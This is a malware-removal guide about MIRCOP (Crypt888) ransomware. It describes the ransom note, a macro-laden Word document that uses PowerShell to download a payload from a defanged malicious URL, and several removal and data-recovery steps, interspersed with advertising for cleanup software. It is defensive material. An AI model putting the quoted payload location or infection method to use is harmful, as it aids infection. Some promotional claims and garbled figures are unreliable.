Severity scale:  

Remove MIRCOP Ransomware virus (Improved Instructions) - Oct 2016 update

removal by Julie Splinters - -   Also known as Crypt888 | Type: Ransomware

MIRCOP ransomware – the “Anonymous” copycat

While ordinary ransomware viruses focus on attacking ordinary users’ personal information, some of them, such as MIRCOP virus (also known as Microcop or Crypt888 ransomware), act as if the hackers are the victims themselves. However, this does not lessen the destructiveness of this particular virus. It has a few distinctive features which make MIRCOP virus stand out from the majority of recent threats. For example, the virus demands an unbelievably huge ransom. In this article, we will present the vital information about this malware and the ways to remove MIRCOP virus from your computer. Keep in mind that automatic antivirus utilities such as Reimage Reimage Cleaner Intego come in handy when eliminating such infections from the infected devices.

Questions about MIRCOP Ransomware virus

The hackers behind Crypt888 ransomware seem to get a liking of the Internet hactivist group called “Anonymous.” Regarding the ransom note, it may seem that the creators of the ransomware belong to this particular organization. Nevertheless, it might as well be that virus owners only impersonate the mentioned group to pose themselves as more respectable, while their real relation to this group is highly questionable. The note goes as follows:

You’ve stolen 48.48 BTC from the wrong people, please be so kind to return them and we will return your files.
Don’t take us for fools, we know more about you than you know about yourself.
Pay us back and we won’t take further action, don’t pay and be prepared.

The screenshot of MIRCOP rasnomware

Just below the note, the hackers indicate a Bitcoin address to which the victim is demanded to send 48,48 BTC, i.e., more than 28,00.00 USD! Luckily, no financial transactions have been made to this account so far, but the drama typical to the “Anonymous” messages puts a lot of pressure on the victims. If your company‘s data has been under MIRCOP’s attack, do not consider paying up as there are absolutely no guarantees that the cyber criminals will be kind enough to return the locked data. Instead, you should focus on MIRCOP removal. In addition, you might try data recovery programs, such as PhotoRec, R-studio or go to the end of this article in order to find other data recovery recommendations. 

Speaking more about the peculiarities of this ransomware, it seems that the infection is related to another file-locking cyber threat called .Locked, which was launched a couple of months before the MIRCOP. It also used the same “Anonymous” trademark logo – Guy Fawkes’s mask – and appended a similar extension. In this case, the virus attaches the extension “Lock.” in front of the corrupted folder. For example, the files will be encoded as Lock.My Pictures or Lock.My Documents. Lastly, the cyber criminals try to pressure the users to pay the money by blackmailing as if they have stolen some money from unknown “very important” people. MIRCOP threat is surely one of the novelties among recent ransomware.

The screenshot of MIRCOP rasnomware note 2

Another interesting and concerning feature of this virus is that it does not limit itself to the file encryption and steals users login credentials from various browsers and social networking applications such as Skype. Similar techniques have already been used by other ransomware, for instance CryptXXX. This is especially useful if the malware creators decide to a blackmail the users by threatening to expose their private information to the public. Also, some of the collected information may be sensitive enough to be used to break into the victims’ bank accounts and steal money from them directly. 

How do hackers plant this ransomware on the victims’ computers?

Reportedly, Crypt888 is distributed via the malicious spam campaign. The targeted users receive a fake Thai customs declaration form. It is a Word document which contains embedded malicious macro settings. If the infected computer’s macro settings are enabled by default, the virus will use the Windows PowerShell to download and set up the virus on the computer. It is now clear that the virus downloads the infectious script from a suspicious hxxp://www[.]blushy[.]nl/u/putty.exe domain, which, interestingly enough, redirects to a Dutch online adult shop.

Later on, the virus downloads three main files which are responsible for the rest of the havoc on the computer: c.exe, responsible for stealing information as well as x.exe and y.exe files, which encode the personal files. It is quite a popular strategy among the ransomware developers to imitate official institutions to convince users into opening the infected attachments. Remain very cautious when opening and downloading attachments of such emails. Always keep in mind that the credentials of official company do not necessarily mean that the email is legitimate. In addition, you should improve the overall protection of the computer by installing a trustworthy anti-spyware program which would not only block the malware but will also decrease the number of received spam emails.

Recommendations for the MIRCOP removal: 

What you should first do when you are infected with MIRCOP virus, is to run the system scan with a malware removal application: antivirus, anti-spyware or anti-malware. If one of these programs fails to eliminate the virus, you can another. Eventually, one utility will take care of the threat and remove MIRCOP from your PC. Unfortunately, this method does not help decrypt the locked files. You might try retrieving them with the help of previously mentioned data recovery applications or reconstruct them from a backup copy. If you do not have it, make sure you make one for your future files. It is not difficult to back up the valuable information using the backup function of the operating system. Please note that this must be done only AFTER the MIRCOP removal. If you still cannot run the respective programs or launch some essential OS functions, feel free to use the recovery guidelines presented below and run the system scan once again.

do it now!
Reimage Happiness
Intego Happiness
Compatible with Microsoft Windows Supported versions Compatible with OS X Supported versions
What to do if failed?
If you failed to remove virus damage using Reimage Intego, submit a question to our support team and provide as much details as possible.
Reimage Intego has a free limited scanner. Reimage Intego offers more through scan when you purchase its full version. When free scanner detects issues, you can fix them using free manual repairs or you can decide to purchase the full version in order to fix them automatically.
Alternative Software
Different software has a different purpose. If you didn’t succeed in fixing corrupted files with Reimage, try running SpyHunter 5.
Alternative Software
Different software has a different purpose. If you didn’t succeed in fixing corrupted files with Intego, try running Combo Cleaner.

To remove MIRCOP Ransomware virus, follow these steps:

Remove MIRCOP Ransomware using Safe Mode with Networking

  • Step 1: Reboot your computer to Safe Mode with Networking

    Windows 7 / Vista / XP
    1. Click Start Shutdown Restart OK.
    2. When your computer becomes active, start pressing F8 multiple times until you see the Advanced Boot Options window.
    3. Select Safe Mode with Networking from the list Select 'Safe Mode with Networking'

    Windows 10 / Windows 8
    1. Press the Power button at the Windows login screen. Now press and hold Shift, which is on your keyboard, and click Restart..
    2. Now select Troubleshoot Advanced options Startup Settings and finally press Restart.
    3. Once your computer becomes active, select Enable Safe Mode with Networking in Startup Settings window. Select 'Enable Safe Mode with Networking'
  • Step 2: Remove MIRCOP Ransomware

    Log in to your infected account and start the browser. Download Reimage Reimage Cleaner Intego or other legitimate anti-spyware program. Update it before a full system scan and remove malicious files that belong to your ransomware and complete MIRCOP Ransomware removal.

If your ransomware is blocking Safe Mode with Networking, try further method.

Remove MIRCOP Ransomware using System Restore

  • Step 1: Reboot your computer to Safe Mode with Command Prompt

    Windows 7 / Vista / XP
    1. Click Start Shutdown Restart OK.
    2. When your computer becomes active, start pressing F8 multiple times until you see the Advanced Boot Options window.
    3. Select Command Prompt from the list Select 'Safe Mode with Command Prompt'

    Windows 10 / Windows 8
    1. Press the Power button at the Windows login screen. Now press and hold Shift, which is on your keyboard, and click Restart..
    2. Now select Troubleshoot Advanced options Startup Settings and finally press Restart.
    3. Once your computer becomes active, select Enable Safe Mode with Command Prompt in Startup Settings window. Select 'Enable Safe Mode with Command Prompt'
  • Step 2: Restore your system files and settings
    1. Once the Command Prompt window shows up, enter cd restore and click Enter. Enter 'cd restore' without quotes and press 'Enter'
    2. Now type rstrui.exe and press Enter again.. Enter 'rstrui.exe' without quotes and press 'Enter'
    3. When a new window shows up, click Next and select your restore point that is prior the infiltration of MIRCOP Ransomware. After doing that, click Next. When 'System Restore' window shows up, select 'Next' Select your restore point and click 'Next'
    4. Now click Yes to start system restore. Click 'Yes' and start system restore
    Once you restore your system to a previous date, download and scan your computer with Reimage Reimage Cleaner Intego and make sure that MIRCOP Ransomware removal is performed successfully.

Bonus: Recover your data

Guide which is presented above is supposed to help you remove MIRCOP Ransomware from your computer. To recover your encrypted files, we recommend using a detailed guide prepared by security experts.

Though this virus has been a mystery to the virus experts for quite some time, finally, there is a breakthrough in the virus decryption. AVG has released Crypt888 decryptor which can be downloaded from the official AVG website or by clicking the previously indicated link. If, however, your device is infected with some new virus variant and the decryption tool is incapable of recovering your files, you can try out the instructions below to do that.   

If your files are encrypted by MIRCOP Ransomware, you can use several methods to restore them:

Data Recovery Pro instructions for MIRCOP data recovery

Data Recovery Pro is one of the data recovery software designed to recover accidentally lost data, but may as well be used to bypass the MIRCOP encryption and retrieve your files. You can try this method out using these instructions below:

  • Download Data Recovery Pro;
  • Follow the steps of Data Recovery Setup and install the program on your computer;
  • Launch it and scan your computer for files encrypted by MIRCOP Ransomware ransomware;
  • Restore them.

How to use Windows Previous Versions feature for the data recovery after MIRCOP encryption

Windows Previous Versions feature is rather easy to use. All the steps you should take are provided below. However, you should not forget that this feature will only be functional in case System restore function has been enabled pre-infiltration. If it wasn’t you can skip the further instructions and move on to other data recovery methods.

  • Find an encrypted file you need to restore and right-click on it;
  • Select “Properties” and go to “Previous versions” tab;
  • Here, check each of available copies of the file in “Folder versions”. You should select the version you want to recover and click “Restore”.

Instructions for data recovery using ShadowExplorer

ShadowExplorer can be a useful feature for restoring data locked by less complex ransomware. Though it may not work for MIRCOP in particular, we still recommend you to try it out and perhaps you will manage to get at least a few of your personal files back.

  • Download Shadow Explorer (;
  • Follow a Shadow Explorer Setup Wizard and install this application on your computer;
  • Launch the program and go through the drop down menu on the top left corner to select the disk of your encrypted data. Check what folders are there;
  • Right-click on the folder you want to restore and select “Export”. You can also select where you want it to be stored.

Crypt888 decryptor method

The best and most guaranteed way of recovering your data is by using the Crypt888 decryptor. Just download the program and follow the further instructions provided by its developers.

Finally, you should always think about the protection of crypto-ransomwares. In order to protect your computer from MIRCOP Ransomware and other ransomwares, use a reputable anti-spyware, such as Reimage Reimage Cleaner Intego, SpyHunter 5Combo Cleaner or Malwarebytes

Access your website securely from any location

When you work on the domain, site, blog, or different project that requires constant management, content creation, or coding, you may need to connect to the server and content management service more often. It is a hassle when your website is protected from suspicious connections and unauthorized IP addresses.

The best solution for creating a tighter network could be a dedicated/fixed IP address. If you make your IP address static and set to your device, you can connect to the CMS from any location and do not create any additional issues for server or network manager that need to monitor connections and activities. This is how you bypass some of the authentications factors and can remotely use your banking accounts without triggering suspicious with each login. 

VPN software providers like Private Internet Access can help you with such settings and offer the option to control the online reputation and manage projects easily from any part of the world. It is better to clock the access to your website from different IP addresses. So you can keep the project safe and secure when you have the dedicated IP address VPN and protected access to the content management system.

Backup files for the later use, in case of the malware attack

Computer users can suffer various losses due to cyber infections or their own faulty doings. Software issues created by malware or direct data loss due to encryption can lead to problems with your device or permanent damage. When you have proper up-to-date backups, you can easily recover after such an incident and get back to work.

It is crucial to create updates to your backups after any changes on the device, so you can get back to the point you were working on when malware changes anything or issues with the device causes data or performance corruption. Rely on such behavior and make file backup your daily or weekly habit.

When you have the previous version of every important document or project you can avoid frustration and breakdowns. It comes in handy when malware occurs out of nowhere. Use Data Recovery Pro for the system restoring purpose.

About the author
Julie Splinters
Julie Splinters - Malware removal specialist

If this free removal guide helped you and you are satisfied with our service, please consider making a donation to keep this service alive. Even a smallest amount will be appreciated.

Contact Julie Splinters
About the company Esolutions

  1. Miranda says:
    June 28th, 2016 at 2:32 am

    I wonder what does the real Anonymous think about these viruses? Or are they the culprits?

  2. Theodore says:
    June 28th, 2016 at 2:33 am

    Finally, something new.

  3. Faye says:
    June 28th, 2016 at 2:33 am

    Who would pay such money?

  4. Orwell5 says:
    June 28th, 2016 at 2:34 am

    Lets watch the show.

  5. Eliza says:
    June 28th, 2016 at 2:35 am

    Interesting. It seems that the big fish made its appearance.

Your opinion regarding MIRCOP Ransomware virus